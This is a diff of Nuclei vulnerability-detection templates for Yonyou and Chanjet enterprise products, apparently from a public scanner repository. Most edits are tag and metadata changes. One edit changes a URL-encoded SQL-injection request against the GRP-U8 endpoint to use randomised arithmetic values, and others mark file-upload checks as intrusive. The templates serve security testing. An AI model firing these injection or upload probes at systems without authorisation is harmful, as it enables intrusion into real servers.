- "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
- "status_code_2 == 200 && contains(body_2, 'println')"
- "status_code_3 == 200 && contains(body_3,'{{string}}')"

2
http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
View File

@ -9,7 +9,7 @@ info:
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
max-request: 2
fofa-query: body="远程通CHANJET_Remote"
verified: true
tags: yonyou,chanjet,sqli

2
http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
View File

@ -12,7 +12,7 @@ info:
max-request: 1
fofa-query: app="用友-UFIDA-NC"
verified: true
tags: yonyou,fileupload,intrusive
tags: yonyou,file-upload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"

10
http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
View File

@ -9,6 +9,11 @@ info:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou,grp,xxe,sqli
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
@ -17,13 +22,14 @@ http:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1759837260"
- "{{result}}"
- type: word
words:

4
http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
View File

@ -10,9 +10,9 @@ info:
- https://www.seebug.org/vuldb/ssvid-99547
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
metadata:
max-request: 2
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
verified: true
tags: yonyou,intrusive,ufida,fileupload
variables:

2
http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
View File

@ -10,7 +10,7 @@ info:
max-request: 2
fofa-query: body="用友U8CRM"
verified: true
tags: yonyou,fileupload,u8-crm
tags: yonyou,file-upload,u8-crm,intrusive
http:
- raw: